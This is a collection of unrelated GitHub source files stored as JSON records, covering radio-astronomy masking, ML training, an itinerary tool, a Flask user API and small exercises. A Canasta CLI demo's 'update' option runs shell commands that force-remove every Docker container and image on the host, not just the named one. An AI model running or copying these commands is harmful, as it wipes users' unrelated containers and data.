#\n x,y = [],[]\n for i in range(len(data_x)):\n if mask[i] == False:\n x.append(data_x[i])\n y.append(data_y[i])\n\n # https://docs.scipy.org/doc/scipy/reference/generated/scipy.interpolate.CubicSpline.html\n #\n cs = CubicSpline(x, y,bc_type='not-a-knot',extrapolate=None)\n new_y = cs(org_data_x[get_outer_bondaries[0]:get_outer_bondaries[1]])\n new_y = pchip_interpolate(x, y,org_data_x[get_outer_bondaries[0]:get_outer_bondaries[1]])\n\n return get_outer_bondaries,new_y\n\ndef mask_true_false(mask,threshold=0.01):\n \"\"\"\n input is mask int\n return a mask\n \"\"\"\n new_mask = deepcopy(mask)\n new_mask = np.zeros(np.array(mask).shape) \n\n # switch to be used\n #\n if threshold > 0:\n select = mask > threshold\n new_mask[select] = 1.0\n\n return new_mask.astype(bool)\n\ndef check_mask(mask):\n \"\"\"\n return info of mask \n \"\"\"\n\n mask_zero_indx = len(np.argwhere(mask == 0))\n mask_ones_indx = len(np.argwhere(mask == 1))\n max_mask = np.cumprod(mask.shape)[-1]\n \n return max_mask,mask_zero_indx,mask_ones_indx\n\n\ndef flag_data(data,inputmask,sigma,stats_type,percentage,smooth_kernels,threshold,flagbyhand):\n \"\"\"\n return a new mask to be used for flagging\n \"\"\"\n\n mask = mask_true_false(inputmask,threshold).astype(bool)\n\n\n # ==============\n\n # mask based on convolution of of the spectrum\n # this handles the background mitigation better \n # then upper and lower boundary flag\n #\n #\n mask_conv = apply_multiple_convolutions(data,mask,smooth_kernels,sigma,stats_type)\n\n\n #mask_conv = apply_multiple_magnitude_convolutions(data,mask_conv,['prewittx','prewitty'],sigma,stats_type)\n\n\n # scipy flagging \n #\n # window_size = 101\n # scipy_masktype = 'triangle'\n #\n # scipy_mask = scipy_masking(dyn_spec_std,scipy_masktype,window_size)\n\n\n # combine all the mask into a final one\n #\n combi_stuff = combine_masks(mask,[mask_conv])\n\n\n # complete channels that are partly masked\n #\n final_mask = complete_fg_mask(combi_stuff,axis=0,percentage=percentage,complete_boundary=9)\n\n\n # clean up the mask itself\n #\n cleanup_kernel = [[0,0,0],[1,1,1],[0,0,0]]\n final_mask = mask_2d_convolve(final_mask.astype(np.float32),final_mask.astype(np.float32),cleanup_kernel,sigma,stats_type)\n #\n cleanup_kernel = [[1,1,1],[1,0,1],[1,1,1]]\n final_mask = mask_2d_convolve(final_mask.astype(np.float32),final_mask.astype(np.float32),cleanup_kernel,sigma,stats_type)\n\n\n # Flag by hand\n #\n if len(flagbyhand[0]) > 1:\n for fg in flagbyhand:\n\n if len(fg) == 2:\n #print('flag channel')\n final_mask[:,fg[0]:fg[1]+1] = 1.0\n if len(fg) == 4:\n #print('flag region')\n final_mask[fg[1]:fg[3]+1,fg[0]:fg[2]+1] = 1.0\n\n # hand over a boolean mask\n # \n final_mask = final_mask.astype(bool)\n\n \n return final_mask\n\n\ndef flag_impact(final_mask,inputmask):\n \"\"\"\n provide info about the flagging impact\n \"\"\"\n\n # in case to check the impact of the flagging process\n #\n f_mask = difference_mask(final_mask.astype(bool),inputmask.astype(bool))\n f_mask_info = check_mask(f_mask)\n\n\n return f_mask_info\n\n\n\n\n","repo_name":"hrkloeck/DASKMSWERKZEUGKASTEN","sub_path":"RFI_MITILIB.py","file_name":"RFI_MITILIB.py","file_ext":"py","file_size_in_byte":17608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2111885323","text":"__author__ = 'D15123543'\n\nfrom RouteCalculator import *\nfrom Itinerary import *\nfrom AirportsInfo import *\n\nclass InputOutput:\n '''\n Class to load & store itineraries from .csv and export sorted itineraries into another .csv.\n '''\n def __init__(self,itinerary_file):\n self.__itineraries = [] # populated when class instantiated, only accessed by methods in this class\n self.load_itineraries= self.import_itineraries(itinerary_file)\n self.__cheapest_routes = [] # populated by sort_routes method, only accessed by methods in this class\n\n # import itineraries csv file from input folder.\n def import_itineraries(self,itinerary_file):\n try:\n with open(os.path.join(\"input\",itinerary_file), \"rt\", encoding=\"utf8\") as file:\n reader = csv.reader(file)\n for row in reader:\n try:\n row = Itinerary(row[0:5], row[5])\n self.__itineraries.append(row)\n except IndexError: # don't load rows with that are not of the correct format\n print(row,\"not loaded. Itinerary must contain 5 airports and 1 aircraft\")\n pass\n except KeyError: # don't load rows with bad data\n pass\n except FileNotFoundError:\n print(\"Invalid filename or directory, no file loaded\")\n return \"No File Found\"\n except IsADirectoryError:\n print(\"No file entered therefore no file loaded\")\n return \"No File Entered\"\n\n # calls pricing calculator to sort routes and appends to cheapest_route attribute.\n def sort_routes(self,calculator,airports_info):\n for itin in self.__itineraries:\n if itin.equipment != \"Invalid Aircraft Type\": # do not run calculation for invalid aircraft types\n new_route = calculator.get_cheapest_route(itin.route,itin.equipment,airports_info) # call route calculator\n if new_route != \"No Route\": # No Route means aircraft could not make journey distance\n self.__cheapest_routes.append(new_route) # if valid route, append to cheapest_routes attribute\n else:\n print(itin.equipment,\"cannot make journey\",itin.route,\"therefore excluded from itinerary output\" )\n else:\n print(itin.route,\"contains an invalid aircraft type therefore excluded from itinerary output\" )\n\n # export cheapest routes to csv file in output folder\n def export_routes(self,export_file=\"Itineraries.csv\"):\n try:\n with open(os.path.join(\"output\",export_file), \"w\", newline='') as file:\n writer = csv.writer(file, delimiter=\",\")\n for itinerary in self.__cheapest_routes:\n try:\n if itinerary is not None: # ignore itineraries that have routes with invalid airports\n csvrow = itinerary\n writer.writerow(csvrow)\n except TypeError: # if itinerary data type is not what is expected ignore.\n pass\n except OSError:\n return \"Invalid Directory\"\n\n\ndef main():\n Aircraft.load_aircrafts()\n itin_file = InputOutput('testroutes.csv')\n calculator = RouteCalculator()\n airports_info = AirportsInfo()\n itin_file.sort_routes(calculator,airports_info)\n itin_file.export_routes()\n\nif __name__ == '__main__':\n main()\n","repo_name":"kinsie84/ItineraryManagementSystem","sub_path":"InputOutput.py","file_name":"InputOutput.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16193136772","text":"import os\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.optim.lr_scheduler\nimport torch.utils.data\nfrom tqdm import tqdm\n\nfrom lbcnn_model import Lbcnn\nfrom utils import calc_accuracy, get_mnist_loader\n\nMODEL_PATH = os.path.join(os.path.dirname(__file__), 'models', 'lbcnn_best.pt')\n\n\ndef test(model=None):\n if model is None:\n assert os.path.exists(MODEL_PATH), \"Train a model first\"\n lbcnn_depth, state_dict = torch.load(MODEL_PATH)\n model = Lbcnn(depth=lbcnn_depth)\n model.load_state_dict(state_dict)\n loader = get_mnist_loader(train=False)\n accuracy = calc_accuracy(model, loader=loader, verbose=True)\n print(\"MNIST test accuracy: {:.3f}\".format(accuracy))\n\n\ndef train(n_epochs=50, lbcnn_depth=2, learning_rate=1e-2, momentum=0.9, weight_decay=1e-4, lr_scheduler_step=5):\n start = time.time()\n models_dir = os.path.dirname(MODEL_PATH)\n if not os.path.exists(models_dir):\n os.makedirs(models_dir)\n\n train_loader = get_mnist_loader(train=True)\n test_loader = get_mnist_loader(train=False)\n model = Lbcnn(depth=lbcnn_depth)\n use_cuda = torch.cuda.is_available()\n if use_cuda:\n model = model.cuda()\n best_accuracy = 0.\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(filter(lambda param: param.requires_grad, model.parameters()), lr=learning_rate,\n momentum=momentum, weight_decay=weight_decay, nesterov=True)\n\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=lr_scheduler_step)\n\n for epoch in range(n_epochs):\n for batch_id, (inputs, labels) in enumerate(\n tqdm(train_loader, desc=\"Epoch {}/{}\".format(epoch, n_epochs))):\n if use_cuda:\n inputs = inputs.cuda()\n labels = labels.cuda()\n optimizer.zero_grad()\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n accuracy_train = calc_accuracy(model, loader=train_loader)\n accuracy_test = calc_accuracy(model, loader=test_loader)\n print(\"Epoch {} accuracy: train={:.3f}, test={:.3f}\".format(epoch, accuracy_train, accuracy_test))\n if accuracy_train > best_accuracy:\n best_accuracy = accuracy_train\n torch.save((lbcnn_depth, model.state_dict()), MODEL_PATH)\n scheduler.step(epoch=epoch)\n train_duration_sec = int(time.time() - start)\n print('Finished Training. Total training time: {} sec'.format(train_duration_sec))\n\n\nif __name__ == '__main__':\n # train includes test phase at each epoch\n train(n_epochs=5)\n","repo_name":"dizcza/lbcnn.pytorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"52"} +{"seq_id":"30594998738","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Hw1.py: Read the data of the Hw1.\"\"\"\n\n\nfrom optparse import OptionParser\nimport logging\nimport os\nimport pprint\nimport nltk\nimport copy\nimport json\nimport random\nimport pdb\nimport perceptron\nimport util\nfrom util import Memoized\n\n__author__ = \"Rami Al-Rfou\"\n__email__ = \"rmyeid@gmail.com\"\n\nLOG_FORMAT = \"%(asctime).19s %(levelname)s %(filename)s: %(lineno)s %(message)s\"\n\nclass Prepositions(util.Document):\n SUPPORTED_PREPOSITIONS = [\"in\", \"of\", \"on\"]\n BLANK_POSITION = \"OOOO\"\n STATEMENT_START = \"\"\n STATEMENT_END = \".\"\n STATEMENT_START_TAG = \"SS\"\n STATEMENT_END_TAG = \".\"\n\n def __init__(self, filename, tokens=[]):\n super(Prepositions, self).__init__(filename, tokens)\n \n def get_featureset(self, statement):\n index = map(lambda tagged_word: tagged_word[1] == Prepositions.BLANK_POSITION, statement).index(True)\n size = len(statement)\n features = {}\n features[\"pWord\"] = Prepositions.STATEMENT_START\n features[\"nWord\"] = Prepositions.STATEMENT_END\n features[\"pTag\"] = Prepositions.STATEMENT_START_TAG\n features[\"nTag\"] = Prepositions.STATEMENT_END_TAG\n label, tag = statement[index]\n if index > 0:\n word, tag = statement[index - 1]\n features[\"pTag\"] = tag\n features[\"pWord\"] = util.STEMMER.lemmatize(word) \n if index < size - 1:\n word, tag = statement[index + 1]\n features[\"nTag\"] = tag\n features[\"nWord\"] = util.STEMMER.lemmatize(word)\n features[\"nChar\"] = features[\"nWord\"][0]\n features[\"pBigram\"] = self.ngram_prob(2, label, (features[\"pWord\"])) \n features[\"nBigram\"] = self.ngram_prob(2, features[\"nWord\"], (label)) \n features[\"Trigram\"] = self.ngram_prob(3, features[\"nWord\"],\n (features[\"pWord\"], label))\n return features\n\n def _get_problems(self, statement):\n problems = []\n new_words = []\n for i in range(len(statement)):\n if statement[i][0].lower() in Prepositions.SUPPORTED_PREPOSITIONS:\n label = statement[i][0]\n new_words = copy.deepcopy(statement)\n new_words[i] = (label, Prepositions.BLANK_POSITION)\n problems.append((new_words, label))\n return problems\n \n @property\n @Memoized\n def problem_set(self):\n problem_set = []\n for stmt in self.pos_tagged_tokens: \n problem_set.extend(self._get_problems(stmt))\n logging.info(\"%d Problems calculated for %s.\" % (len(problem_set), self.name))\n if util.log_level() == logging.DEBUG:\n self.dump_json(problem_set, \"pset\")\n return problem_set\n\n def get_labeled_featureset(self):\n labeled_featureset = []\n for labeled_problem in self.problem_set:\n problem, label = labeled_problem\n labeled_featureset.append((self.get_featureset(problem), label))\n logging.info(\"%d labeled featureset is calculated for %s.\"\n % (len(labeled_featureset), self.name))\n if util.log_level() == logging.DEBUG:\n self.dump_json(labeled_featureset, \"lfs\")\n return labeled_featureset\n\nclass Baseline1(Prepositions):\n def __init__(self, filename):\n super(Baseline1, self).__init__(filename)\n \n def labels(self):\n return Prepositions.SUPPORTED_PREPOSITIONS\n \n def classify(self, featureset):\n choices = []\n for preposition in Prepositions.SUPPORTED_PREPOSITIONS:\n P = self.ngram_prob(3, featureset[\"nWord\"], (featureset[\"pWord\"], preposition))\n choices.append((P, preposition))\n return max(choices)[1]\n \n def batch_classify(self, featuresets):\n return [self.classify(fs) for fs in featuresets]\n\nclass Baseline2(Baseline1): \n def __init__(self, filename):\n super(Baseline1, self).__init__(filename)\n \n @property\n @Memoized\n def tags_document(self):\n pos_tokens = []\n for sentence in self.pos_tagged_tokens:\n sentence_tags = []\n for tagged_word in sentence:\n word = tagged_word[0]\n tag = tagged_word[1]\n if tag == \"IN\" and word in Prepositions.SUPPORTED_PREPOSITIONS:\n sentence_tags.append(word)\n else:\n sentence_tags.append(tag)\n pos_tokens.append(sentence_tags)\n return util.Document(\"%s.tag\" % self.name, tokens=pos_tokens)\n \n def classify(self, featureset):\n choices = []\n for preposition in Prepositions.SUPPORTED_PREPOSITIONS:\n P = self.tags_document.ngram_prob(3, featureset[\"nTag\"], (featureset[\"pTag\"], preposition))\n choices.append((P, preposition))\n return max(choices)[1]\n\n \n\ndef main(options, args):\n logging.info(\"processing started ...\")\n training_document = Prepositions(options.filename)\n testing_document = Prepositions(options.testfile)\n baseline1_document = Baseline1(options.filename)\n baseline2_document = Baseline2(options.filename)\n\n training_set = training_document.get_labeled_featureset()\n classifier = perceptron.train(training_set)\n\n testing_set = testing_document.get_labeled_featureset()\n logging.info(\"Accuracy of the Perceptron Classifier: %f\",\n nltk.classify.accuracy(classifier, testing_set))\n\n errors = open('errors', 'a')\n for fs, label in testing_set:\n if classifier.classify(fs) != label:\n errors.write(str((fs, label))+'\\n')\n\n logging.info(\"Training NaiveBayes classifier\")\n bayes_classifier = nltk.NaiveBayesClassifier.train(training_set)\n logging.info(\"Accuracy of the NaiveBayes Classifier: %f\",\n nltk.classify.accuracy(bayes_classifier, testing_set))\n\n logging.info(\"Accuracy of the Baseline1: %f\",\n nltk.classify.accuracy(baseline1_document, testing_set))\n \n logging.info(\"Accuracy of the Baseline2: %f\",\n nltk.classify.accuracy(baseline2_document, testing_set))\n\nif __name__ == \"__main__\":\n parser = OptionParser()\n parser.add_option(\"-f\", \"--file\", dest=\"filename\", help=\"Input file\")\n parser.add_option(\"-t\", \"--test\", dest=\"testfile\", help=\"Test file\")\n parser.add_option(\"-l\", \"--log\", dest=\"log\", help=\"log verbosity level\",\n default=\"INFO\")\n (options, args) = parser.parse_args()\n \n \n numeric_level = getattr(logging, options.log.upper(), None)\n logging.basicConfig(level=numeric_level, format=LOG_FORMAT)\n main(options, args)\n","repo_name":"aboSamoor/NLP","sub_path":"hw1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":6163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71480116326","text":"import os\nimport sys\nimport argparse\n\ndef main():\n # create a cli argument parser for dispaying date with optional argument\n parser = argparse.ArgumentParser(description='Welcome to Canasta CLI')\n\n # create an argument to run docker container\n parser.add_argument('-r', '--run', help='run docker container', action='store_true')\n\n # create an argument to update docker container by stopping and reinstalling it\n # take the name of container from the user as argument\n parser.add_argument('-u', '--update', help='update docker container', action='store_true')\n \n # create a argument to Move into root directory\n parser.add_argument('-m', '--move', help='move into root directory', action='store_true')\n\n args = parser.parse_args()\n\n # create a argument to Move into root directory\n if args.move:\n os.chdir('/')\n\n # run docker container\n if args.run:\n os.system('docker run -it --rm -p 8080:8080 -v $(pwd):/usr/src/app/src/main.py -w /usr/src/app/src/main.py node:10.15.3-alpine node src/main.js')\n \n # update the docker container image by deleting and reinstall it\n # take the name of container from argument \n if args.update:\n os.system('docker rm -f $(docker ps -a -q)')\n os.system('docker rmi $(docker images -q)')\n os.system('docker build -t node:10.15.3-alpine .')\n os.system('docker run -it --rm -p 8080:8080 -v $(pwd):/usr/src/app/src/main.py -w /usr/src/app/src/main.py node:10.15.3-alpine node src/main.js')\n\n # if no argument is passed, display help\n if len(sys.argv) == 1:\n parser.print_help()\n \nif __name__ == '__main__':\n main()","repo_name":"abhi-bhatra/Canasta-cli-demo","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26886535239","text":"from firebase_admin import auth\nfrom flask import Blueprint, jsonify, request\nfrom project.controllers.user_controller import UserController\nfrom project.helpers.helper_auth import check_token\nfrom project.helpers.helper_date import date_to_str\nfrom project.helpers.helper_media import MediaRequester\nfrom flask_restx import Namespace, Resource, fields\n\n\napi = Namespace(\n name=\"Users\", path=\"/admin/users\", description=\"Users related endpoints\"\n)\n\nuser_model = api.model(\n \"User\",\n {\n \"active\": fields.Boolean(required=False, description=\"User system status\"),\n \"email\": fields.String(required=False, description=\"User email\"),\n \"artist_id\": fields.String(required=False, description=\"User artist id\"),\n \"createdAt\": fields.DateTime(required=False, description=\"User created at\"),\n \"id\": fields.String(required=True, description=\"User id\"),\n \"permissions\": fields.List(\n fields.String, required=False, description=\"User permissions\"\n ),\n \"roles\": fields.List(fields.Integer, required=False, description=\"User roles\"),\n \"uid\": fields.String(required=False, description=\"User firebase uid\"),\n \"updatedAt\": fields.DateTime(required=False, description=\"User updated at\"),\n \"notificationToken\": fields.String(\n required=False, description=\"User notification token\"\n ),\n \"name\": fields.String(required=False, description=\"User name\"),\n \"location\": fields.String(required=False, description=\"User location\"),\n \"genres\": fields.List(fields.String, required=False, description=\"User genres\"),\n },\n)\n\nuser_response_model = api.inherit(\"User Response\", user_model)\n\n\nuser_put_response_model = api.model(\n \"User Put Response\",\n {\n \"code\": fields.String(\n required=True,\n description=\"User updated\",\n example=\"user_updated\",\n ),\n \"data\": fields.Nested(user_response_model),\n },\n)\n\n\ndef user_schema(user):\n try:\n artist_data, status_code = MediaRequester.get(f\"artists/{user.artist_id}\")\n if status_code != 200:\n artist_data = None\n email = auth.get_user(user.uid).email\n except:\n artist_data = None\n email = None\n return {\n \"id\": user.id,\n \"uid\": user.uid,\n \"artist_id\": user.artist_id,\n \"roles\": [role.id for role in user.roles],\n \"permissions\": [permission for permission in user.permissions],\n \"active\": user.active,\n \"is_deleted\": user.is_deleted,\n \"created_at\": date_to_str(user.created_at) if user.created_at else None,\n \"updated_at\": date_to_str(user.updated_at) if user.updated_at else None,\n \"email\": email,\n \"notification_token\": user.notification_token,\n \"name\": artist_data.get(\"name\") if artist_data else None,\n \"location\": artist_data.get(\"location\") if artist_data else None,\n \"genres\": artist_data.get(\"genres\") if artist_data else None,\n }\n\n\n@api.route(\"\")\nclass Users(Resource):\n @check_token\n @api.response(\n 200,\n \"Success\",\n fields.List(\n fields.Nested(\n user_response_model, required=False, description=\"List of users\"\n )\n ),\n )\n def get(self):\n return [user_schema(user) for user in UserController.load_all()], 200\n\n\n@api.route(\"/id/\", doc={\"params\": {\"id\": \"User id\"}})\nclass User(Resource):\n @check_token\n @api.response(200, \"Success\", user_response_model)\n @api.doc(responses={404: \"{code: NO_USER_FOUND}\"})\n def get(self, id):\n user = UserController.load_by_id(id)\n if not user:\n return (\n {\"code\": \"NO_USER_FOUND\"},\n 404,\n )\n return user_schema(user), 200\n\n @api.expect(user_model)\n @api.response(200, \"Success\", user_put_response_model)\n @api.doc(responses={404: \"{code: NO_USER_FOUND}\"})\n def put(self, id):\n user = UserController.load_updated(id, **request.json)\n if not user:\n return (\n {\"code\": \"NO_USER_FOUND\"},\n 404,\n )\n\n return (\n {\n \"code\": \"USER_UPDATED\",\n \"data\": user_schema(user),\n },\n 200,\n )\n","repo_name":"taller2-grupo10/users-be","sub_path":"project/blueprints/users_blueprint.py","file_name":"users_blueprint.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"21436135066","text":"from __future__ import annotations\n\nimport pathlib\n\nfrom pydantic import Field, create_model\n\nfrom fortls.interface import cli\n\n\ndef create_schema(root: pathlib.Path | None = None):\n if not root:\n root = pathlib.Path(__file__).parent\n\n parser = cli(\"fortls\")\n only_vals = {}\n for arg in parser._actions:\n if (\n arg.dest == \"help\"\n or arg.dest == \"version\"\n or arg.help == \"==SUPPRESS==\"\n or (arg.dest.startswith(\"debug\") and arg.dest != \"debug_log\")\n ):\n continue\n val = arg.default\n desc: str = arg.help.replace(\"%(default)s\", str(val)) # type: ignore\n only_vals[arg.dest] = Field(val, description=desc) # type: ignore\n\n m = create_model(\"fortls schema\", **only_vals)\n m.__doc__ = \"Schema for the fortls Fortran Language Server\"\n\n with open(str(root / \"fortls.schema.json\"), \"w\") as f:\n print(m.schema_json(indent=2), file=f)\n print(f\"Created schema file: {root / 'fortls.schema.json'}\")\n\n\nif __name__ == \"__main__\":\n create_schema()\n","repo_name":"fortran-lang/fortls","sub_path":"fortls/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":182,"dataset":"github-code","pt":"52"} +{"seq_id":"20538549496","text":"# 解法1\n# 走完环的前题为gas总量大于cost总量 设置起始点\n# 当前的gas值大于cost值,就可以继续前进,此时到下一个网站,剩余的gas加上当前的gas再减去cost,看是否大于0,若大于0,\n# 则继续前进。当到达某一网站时,若这个值小于0了,则说明从起点到这个点中间的任何一个点都不能作为起点,\n# 则把起点设为下一个点,继续遍历。当遍历完整个环时,当前保存的起点即为所求(因题目有说若有解则只有唯一解)\nclass Solution:\n def canCompleteCircuit(self, gas: list[int], cost: list[int]) -> int:\n start = 0 # 起点索引\n tank = 0 # 当前剩余油量\n total = 0 # 油量 与 消耗 相减的总量\n\n # 遍历站点 \n for i in range(len(gas)):\n # 剩余油量 + gas[i] - cost[i] < 0 则起始点移至i+1 并将剩余油量归零\n if tank + gas[i] - cost[i] < 0:\n start = i + 1 \n tank = 0\n else:\n tank += gas[i] - cost[i]\n total += gas[i] - cost[i]\n # 若总消耗大于总油量 不可能跑完整个环\n return -1 if total < 0 else start\n","repo_name":"CivilAisys/LeetCode","sub_path":"134. Gas Station/134. Gas Station.py","file_name":"134. Gas Station.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1376283298","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 19 15:08:09 2014\n\n@author: Poorna\n\"\"\"\n\nfrom fr3d.cif.reader import Cif\n\ndef main(filename):\n with open(filename, 'rb') as raw:\n structure = Cif(raw).structure()\n print('Iterating over atoms')\n for residue in structure.residues(chain='A', sequence = 'C'):\n for atom in residue.atoms():\n print(residue.unit_id())\n print(atom.name)\nmain('E:\\\\Leontis\\\\Python scripts\\\\CIF\\\\2AW7.cif')\n ","repo_name":"BGSU-RNA/fr3d-python","sub_path":"examples/print_atom_name.py","file_name":"print_atom_name.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"28709776706","text":"#!/usr/bin/python3\n\"\"\"read lines\"\"\"\n\n\ndef read_lines(filename=\"\", nb_lines=0):\n \"\"\"function\"\"\"\n nlines = len(open(filename).readlines())\n with open(filename, encoding=\"utf-8\") as file:\n if nb_lines > 0 and nb_lines < nlines:\n for lines in range(nb_lines):\n print(file.readline(), end=\"\")\n else:\n print(file.read(), end=\"\")\n","repo_name":"jcamilovillah/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/2-read_lines.py","file_name":"2-read_lines.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8741602737","text":"import sys, os\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\n\nclass DlgMain(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"My GUI\")\n self.resize(400, 400)\n self.btn = QPushButton(\"Get Font\", self)\n self.btn.move(130, 180)\n self.btn.clicked.connect(self.evt_btn_clicked)\n\n def evt_btn_clicked(self):\n font, bOk = QFontDialog.getFont()\n if bOk:\n print(font.family())\n print(font.italic())\n print(font.bold())\n print(font.weight())\n print(font.pointSize())\n self.btn.setFont(font)\n else:\n font = QFont(\"Times New Roman\", 24, 81, True)\n print(font.family())\n print(font.italic())\n print(font.bold())\n print(font.weight())\n print(font.pointSize())\n self.btn.setFont(font)\n\n font = QFont(\"Arial\", 24, 81, True)\n print(font.family())\n print(font.italic())\n print(font.bold())\n print(font.weight())\n print(font.pointSize())\n self.btn.setFont(font)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n dlgMain = DlgMain()\n dlgMain.show()\n sys.exit(app.exec_())","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/PyQt5_From_A-Z/fontDialog_finished.py","file_name":"fontDialog_finished.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70907777765","text":"import csv\n\nclass CSVAgent():\n\n '''\n Parses CSV and returns dates, amounts, and locations\n that will create completedTransaction objects.\n '''\n\n def parseFile(self, fileName):\n f = open(fileName, 'r')\n lines = f.readlines()\n \n dateList = []\n amountList = []\n locationList = []\n\n for line in lines:\n num_strs = line.split(',')\n date = num_strs[0]\n date = date[1:-1]\n dateList.append(date)\n amount = num_strs[1]\n amount = amount[1:-1]\n amountList.append(amount)\n location = num_strs[4]\n location = location[:-1]\n locationList.append(location)\n\n f.close()\n\n print(dateList)\n return dateList, amountList, locationList\n ","repo_name":"kscott27/TransactionSorter","sub_path":"CSVAgent.py","file_name":"CSVAgent.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6095129632","text":"\"\"\"This solution satisfies the requirements but is really slow\"\"\"\n\nimport asyncio\nimport json\nimport sys\n\nimport requests\nfrom aiohttp import ClientSession, ClientTimeout\nfrom gzip_stream import AsyncGZIPDecompressedStream\nfrom tqdm import tqdm\n\nURL = \"https://antm-pt-prod-dataz-nogbd-nophi-us-east1.s3.amazonaws.com/anthem/2023-04-01_anthem_index.json.gz\"\nLOOKUP_URL = (\n \"https://antm-pt-prod-dataz-nogbd-nophi-us-east1.s3.amazonaws.com/anthem/{ein}.json\"\n)\n\n\ndef process_ein(ein):\n urls = set()\n\n resp = requests.get(LOOKUP_URL.format(ein=ein))\n if resp.status_code != 200:\n print(resp.text)\n raise RuntimeError(f\"Failed to download file: {resp.status_code}\")\n\n if \"_PPO_\" not in resp.text:\n return urls\n\n data = resp.json()\n\n for f in data[\"Blue Cross Blue Shield Association Out-of-Area Rates Files\"]:\n if f[\"displayname\"].split(\"2023-04_\")[1][:2]:\n urls.add(f[\"url\"])\n\n return urls\n\n\ndef process_line(line):\n data = json.loads(line)\n if data[\"reporting_plans\"][0][\"plan_id_type\"] != \"EIN\":\n # skip non-EIN plans for now\n return set()\n\n ein = data[\"reporting_plans\"][0][\"plan_id\"]\n\n return process_ein(ein)\n\n\nasync def download_file(url: str):\n ny_urls = set()\n\n async with ClientSession(timeout=ClientTimeout(total=60 * 60 * 4)) as session:\n async with session.get(url) as resp:\n if resp.status != 200:\n raise RuntimeError(f\"Failed to download file: {resp.status}\")\n\n decompressed_stream = AsyncGZIPDecompressedStream(resp.content)\n\n # create progress bar that gives human-readable file size\n progress_bar = tqdm(\n unit=\"B\",\n unit_scale=True,\n unit_divisor=1024,\n total=int(resp.headers[\"Content-Length\"]),\n desc=\"Downloading\",\n )\n\n unfinished_line = \"\"\n\n while True:\n # read in 1mb chunks\n chunk = await decompressed_stream.read(1024 * 1024)\n if not chunk:\n break\n\n # if the last line was not finished, add it to the beginning of the next chunk\n chunk = unfinished_line + chunk.decode()\n # find the last newline in the chunk\n last_newline = chunk.rfind(\"\\n\")\n # if there is no newline, then the last line is not finished\n if last_newline == -1:\n unfinished_line = chunk\n continue\n # otherwise, save everything after the last newline for the next chunk\n unfinished_line = chunk[last_newline + 1 :]\n # only process the lines before the last newline\n chunk = chunk[:last_newline]\n\n # each line is a new \"reporting_plans\" object (except for the first few lines)\n for line in chunk.splitlines():\n if line.startswith('{\"reporting_plans\"'):\n # take out the trailing comma\n # add the returned urls to the set\n ny_urls = process_line(line[:-1]) | ny_urls\n\n progress_bar.update(1024 * 1024)\n\n progress_bar.close()\n\n with open(\"ny_urls.txt\", \"w\") as f:\n f.write(\"\\n\".join(ny_urls))\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(download_file(sys.argv[1] if len(sys.argv) > 1 else URL))\n","repo_name":"johnwalz97/serif-health-takehome","sub_path":"serif_health_takehome/solution_v2.py","file_name":"solution_v2.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34405421307","text":"import numpy as np\nfrom scipy.sparse import csr_matrix\nimport os\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.decomposition import TruncatedSVD\n\n\ndef read(dataset):\n TRAINING_DOC_NUM = 11269\n TESTING_DOC_NUM = 7505\n VOC_SIZE = 61188\n if \"dataset\" not in dataset:\n raise NameError(\"dataset needs to be specified.\")\n\n if dataset[\"dataset\"] == \"all\":\n training_data_tuples = get_data_tuples(\n os.path.join(dataset[\"path\"], 'train.data'))\n training_labels = get_labels(os.path.join(dataset[\"path\"], 'train.label'))\n testing_data_tuples = get_data_tuples(\n os.path.join(dataset[\"path\"], 'test.data'))\n testing_labels = get_labels(os.path.join(dataset[\"path\"], 'test.label'))\n testing_data_tuples[:, 0] += TRAINING_DOC_NUM\n data_tuples = np.concatenate(\n (training_data_tuples, testing_data_tuples), axis=0)\n labels = np.concatenate((training_labels, testing_labels), axis=0)\n DOC_NUM = TRAINING_DOC_NUM + 